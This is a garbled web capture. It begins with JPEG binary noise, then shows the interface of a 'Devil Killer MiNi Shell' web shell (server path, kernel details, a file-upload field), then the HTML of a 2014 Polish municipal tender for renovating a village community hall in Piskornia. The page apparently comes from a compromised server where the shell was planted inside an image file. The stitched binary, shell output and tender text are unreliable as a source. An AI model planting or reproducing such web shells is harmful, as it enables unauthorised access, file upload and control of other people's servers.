JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140618/131855-N-2014.html

<p class="kh_header"><b>Pokrzywnica: Remont i wyposażenie świetlicy wiejskiej w Piskorni wraz z zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 131855 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pokrzywnica , Al. Jana Pawła II 1, 06-121 Pokrzywnica, woj. mazowieckie, tel. 023 6918721, faks 023 6918555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pokrzywnica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.pokrzywnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i wyposażenie świetlicy wiejskiej w Piskorni wraz z zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia

Przedmiotem zamówienia jest: Remont i wyposażenie świetlicy wiejskiej w Piskorni wraz z zagospodarowaniem terenu


W zakres rzeczowy wchodzi wykonanie: 
Roboty rozbiórkowe i demontażowe (Demontaż okładzin ściennych posadzkowych oraz drzwi i okien, instalacji elektrycznej, pieców kaflowych itp)
Roboty murowe (Uzupełnienie ścian  i wymurowanie ścianek działowych)
Stolarka okienna i drzwiowa (Montaż stolarki okiennej i drzwiowej)
Tynki malowanie i licowanie ścian (Wykonanie tynków na ścianach i stropie oraz oblicowanie ścian płytkami w pomieszczeniu socjalnym, wykonanie gładzi i malowanie)
Posadzki (Wykonanie izolacji przeciwwilgociowej i nowych warstw posadzkowych)
Instalacje elektryczne (Montaż okablowania elektrycznego,   instalacji oświetlenia i gniazd wtykowych wraz z wykonaniem wiz-tu od granicy do budynku)
Instalacja zimnej i ciepłej wody użytkowej. (Wykonanie instalacji ciepłej i zimnej w pomieszczeniu socjalnym i WC)
Instalacja kanalizacji (Wykonanie instalacji kanalizacyjnej w pomieszczeniu socjalnym i WC)
Wyposażenie (Dostawa i montaż w krzesła stoły, gra piłkarzyki, stół do tenisa wraz z kompletnym wyposażeniem, telewizor , antena wraz okablowaniem)
Elewacja (Docieplenie ścian zewnętrznych z wykonaniem wyprawy elewacyjnej, montaż daszku nad wejściem, wykonanie obróbek blacharskich)
Schody zewnętrzne i ogrodzenia ( Wykonanie schodów wejściowych do świetlicy wraz z balustradami, wykończenie nawierzchni, wykonanie ogrodzenia terenu montaż bramy i furtki)
Utwardzenie nawierzchni z kostki i zieleń (Utwardzenie nawierzchni przed budynkiem z kostki brukowej na podbudowie piaskowo cementowej , montaż ławek parkowych oraz stojaka na rowery, wykonanie trawnika)
Wentylacja grawitacyjna (Udrożnienie wentylacji grawitacyjnej i wykonanie nowych kratek wentylacyjnych w pom. Socjalnym , WC, i pomieszczeniu świetlicowym)
Prace geodezyjne (wytyczenie, inwentaryzacja powykonawcza)

2. Szczegółowy opis przedmiotu zamówienia zawiera:
przedmiar  - zał. nr 7
projekt umowy - zał. nr 8
specyfikacja techniczna wykonania i odbioru robót - zał. nr 10
Szczegółowe uzgodnienia  dotyczące rozmieszczenia urządzeń, powierzchni utwardzonych kolorystyki itp. będą uzgadniane bezpośrednio z wyłonionym Wykonawcą.
Wspólny słownik Zamówień (CPV): 45000000-7  Roboty budowlane
Dodatkowe przedmioty: 

45111300-1 - Roboty rozbiórkowe	
45262520-2 - Roboty murowe
45421000-4 - Roboty w zakresie stolarki budowlanej	
45324000-4 - Roboty w zakresie okładziny tynkowej
45430000-0 - Pokrywanie podłóg i ścian
45310000-3 - Roboty instalacyjne elektryczne
45330000-9 - Roboty instalacyjne wodno- kanalizacyjne i sanitarne
45332300-6 - Roboty instalacyjne kanalizacyjne
45443000-4 - Roboty elewacyjne
45342000-6 - Wznoszenie ogrodzeń
45233250-6 Roboty w zakresie nawierzchni , z wyjątkiem dróg
	
UWAGA !!
Tam, gdzie w SIWZ lub załącznikach zostało wskazane pochodzenie ( marka, znak towarowy, producent, dostawca) materiałów lub norm, o których mowa w art. 30 ust.1 - 3 ustawy Pzp, Zamawiający dopuszcza złożenie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas wykonywania przedmiotu zamówienia.
Materiały użyte przez Wykonawcę do wykonania przedmiotu zamówienia będą posiadać odpowiednie atesty, i będą zgodne z przewidzianymi prawem normami.

Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach  niniejszego postępowania przez Zamawiającego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Opis przedmiotu zamówienia

Przedmiotem zamówienia jest: Remont i wyposażenie świetlicy wiejskiej w Piskorni wraz z zagospodarowaniem terenu


W zakres rzeczowy wchodzi wykonanie: 
Roboty rozbiórkowe i demontażowe (Demontaż okładzin ściennych posadzkowych oraz drzwi i okien, instalacji elektrycznej, pieców kaflowych itp)
Roboty murowe (Uzupełnienie ścian  i wymurowanie ścianek działowych)
Stolarka okienna i drzwiowa (Montaż stolarki okiennej i drzwiowej)
Tynki malowanie i licowanie ścian (Wykonanie tynków na ścianach i stropie oraz oblicowanie ścian płytkami w pomieszczeniu socjalnym, wykonanie gładzi i malowanie)
Posadzki (Wykonanie izolacji przeciwwilgociowej i nowych warstw posadzkowych)
Instalacje elektryczne (Montaż okablowania elektrycznego,   instalacji oświetlenia i gniazd wtykowych wraz z wykonaniem wiz-tu od granicy do budynku)
Instalacja zimnej i ciepłej wody użytkowej. (Wykonanie instalacji ciepłej i zimnej w pomieszczeniu socjalnym i WC)
Instalacja kanalizacji (Wykonanie instalacji kanalizacyjnej w pomieszczeniu socjalnym i WC)
Wyposażenie (Dostawa i montaż w krzesła stoły, gra piłkarzyki, stół do tenisa wraz z kompletnym wyposażeniem, telewizor , antena wraz okablowaniem)
Elewacja (Docieplenie ścian zewnętrznych z wykonaniem wyprawy elewacyjnej, montaż daszku nad wejściem, wykonanie obróbek blacharskich)
Schody zewnętrzne i ogrodzenia ( Wykonanie schodów wejściowych do świetlicy wraz z balustradami, wykończenie nawierzchni, wykonanie ogrodzenia terenu montaż bramy i furtki)
Utwardzenie nawierzchni z kostki i zieleń (Utwardzenie nawierzchni przed budynkiem z kostki brukowej na podbudowie piaskowo cementowej , montaż ławek parkowych oraz stojaka na rowery, wykonanie trawnika)
Wentylacja grawitacyjna (Udrożnienie wentylacji grawitacyjnej i wykonanie nowych kratek wentylacyjnych w pom. Socjalnym , WC, i pomieszczeniu świetlicowym)
Prace geodezyjne (wytyczenie, inwentaryzacja powykonawcza)

2. Szczegółowy opis przedmiotu zamówienia zawiera:
przedmiar  - zał. nr 7
projekt umowy - zał. nr 8
specyfikacja techniczna wykonania i odbioru robót - zał. nr 10
Szczegółowe uzgodnienia  dotyczące rozmieszczenia urządzeń, powierzchni utwardzonych kolorystyki itp. będą uzgadniane bezpośrednio z wyłonionym Wykonawcą.
Wspólny słownik Zamówień (CPV): 45000000-7  Roboty budowlane
Dodatkowe przedmioty: 

45111300-1 - Roboty rozbiórkowe	
45262520-2 - Roboty murowe
45421000-4 - Roboty w zakresie stolarki budowlanej	
45324000-4 - Roboty w zakresie okładziny tynkowej
45430000-0 - Pokrywanie podłóg i ścian
45310000-3 - Roboty instalacyjne elektryczne
45330000-9 - Roboty instalacyjne wodno- kanalizacyjne i sanitarne
45332300-6 - Roboty instalacyjne kanalizacyjne
45443000-4 - Roboty elewacyjne
45342000-6 - Wznoszenie ogrodzeń
45233250-6 Roboty w zakresie nawierzchni , z wyjątkiem dróg
	
UWAGA !!
Tam, gdzie w SIWZ lub załącznikach zostało wskazane pochodzenie ( marka, znak towarowy, producent, dostawca) materiałów lub norm, o których mowa w art. 30 ust.1 - 3 ustawy Pzp, Zamawiający dopuszcza złożenie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę  podczas wykonywania przedmiotu zamówienia.
Materiały użyte przez Wykonawcę do wykonania przedmiotu zamówienia będą posiadać odpowiednie atesty, i będą zgodne z przewidzianymi prawem normami.

Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach  niniejszego postępowania przez Zamawiającego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.20-2, 45.42.10.00-4, 45.32.40.00-4, 45.43.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.33.23.00-6, 45.44.30.00-4, 45.34.20.00-6, 45.23.32.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości: 2.000,00 słownie: (dwa tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, zatem Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
	Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnił warunek dotyczący niezbędnej wiedzy i doświadczenia, jeżeli:
a)	wykaże, że zrealizował w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zadanie  polegające na budowie, przebudowie, rozbudowie lub remoncie budynków  o wartości brutto nie mniejszej niż 100.000,00 zł słownie: sto tysięcy złotych.
b)	przedłoży dokumenty potwierdzające, że zamówienie to zostało wykonane z zasadami sztuki budowlanej i prawidłowo ukończone ( np.: referencje,  protokoły odbioru)

Ocena spełniania warunku odbywać się będzie na podstawie dokumentów i oświadczeń załączonych do oferty, zgodnie z formułą spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
	Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca załączył do oferty:
a)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia , a także zakresu wykonywanych  przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Dysponuje lub będzie dysponować co najmniej 1 osobą na stanowisko kierownika budowy - posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie, w specjalności konstrukcyjno - budowlanej w zakresie wykonawstwa lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów obowiązujących w dacie ich wydania.
b)	oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
	

Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w wykazie osób i oświadczeniu.

Uwaga: Zgodnie z polskim prawem, obywatel państwa członkowskiego posiadający kwalifikacje zawodowe inżyniera budownictwa, który prowadzi działalność w zakresie tego zawodu w innym niż Rzeczpospolita Polska państwie członkowskim ma prawo do wykonywania tego zawodu na terytorium Rzeczypospolitej Polskiej - w ramach transgranicznego świadczenia usług - bez konieczności uznawania kwalifikacji zawodowych, lecz po przeprowadzeniu właściwego postępowania przez odpowiedni organ samorządu zawodowego w Polsce, na zasadach określonych w art. 20a ustawy o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2008 nr 210, poz. 1321).

Uwaga: Wykonawca w przypadku wyboru jego oferty zobowiązany jest przedstawić Zamawiającemu nie później niż w dniu podpisania umowy dokumenty potwierdzające posiadanie uprawnień przez osobę/osoby pełniącą funkcję kierownika budowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Pzp. Wzór oświadczenia załączony jest do SIWZ jako załącznik Nr 2. Złożenie przez Wykonawcę przedmiotowego oświadczenia będzie stanowiło podstawę do oceny spełnienia warunku udziału  w postępowaniu. 
Ocena spełnienia wymaganego warunku dokonana zostanie według formuły: spełnia - nie spełnia.

2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach              zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,             niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej              sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami              niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>3.	Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia, w takim przypadku złożona oferta spełniać musi następujące wymagania:
1)	w odniesieniu do wymagań postawionych przez Zamawiającego, Wykonawcy muszą udokumentować, że łącznie spełniają warunki określone w art. 22 ust. 1 pkt 1-3, oraz każdy z Wykonawców musi wykazać, brak podstaw do wykluczenia zgodnie z art. 24 ust. 1 ustawy oraz przedstawić dokumenty o których mowa w pkt.V.2.b) SIWZ.
2)	wykonawcy występujący wspólnie ustanawiają spośród siebie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
3)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik.
4.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
5.	Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają      wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
6.	Zamawiający odrzuca ofertę, jeżeli:
1)	jest niezgodną z ustawą;
2)	 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych;
3)	 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5)	 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia;
6)	 zawiera błędy w obliczeniu ceny;
7)	 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych;
8)	jest nieważna na podstawie odrębnych przepisów;;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy zał nr 1, Parafowany przez Wykonawce wzór umowy zal nr 8, Wypełniony kosztorys ofertowy wg przedmiarów zał nr 8, Pełnomocnictwo - jeśli dotyczy, W przypadku podmiotów występujących wspólnie (powołanie konsorcjum) pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych, Wykaz podwykonawców, w przypadku gdy wykonawca powierzy część zamówienia podwykonawcom - jeśli dotyczy zał  nr 9 do SIWZ, Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	zmiana terminu realizacji przedmiotu umowy będzie możliwa w przypadku:
1)	wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia;
2)	wstrzymania przez Zamawiającego wykonania robót nie wynikających z przyczyn leżących po stronie Wykonawcy. Powyższe nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru w przypadku stwierdzenia nieprawidłowości w wykonywaniu przedmiotu umowy;
3)	konieczności wprowadzenia przez Zamawiającego korekt w dokumentacji projektowej (usunięcie wad projektu lub wprowadzenia rozwiązań zamiennych);
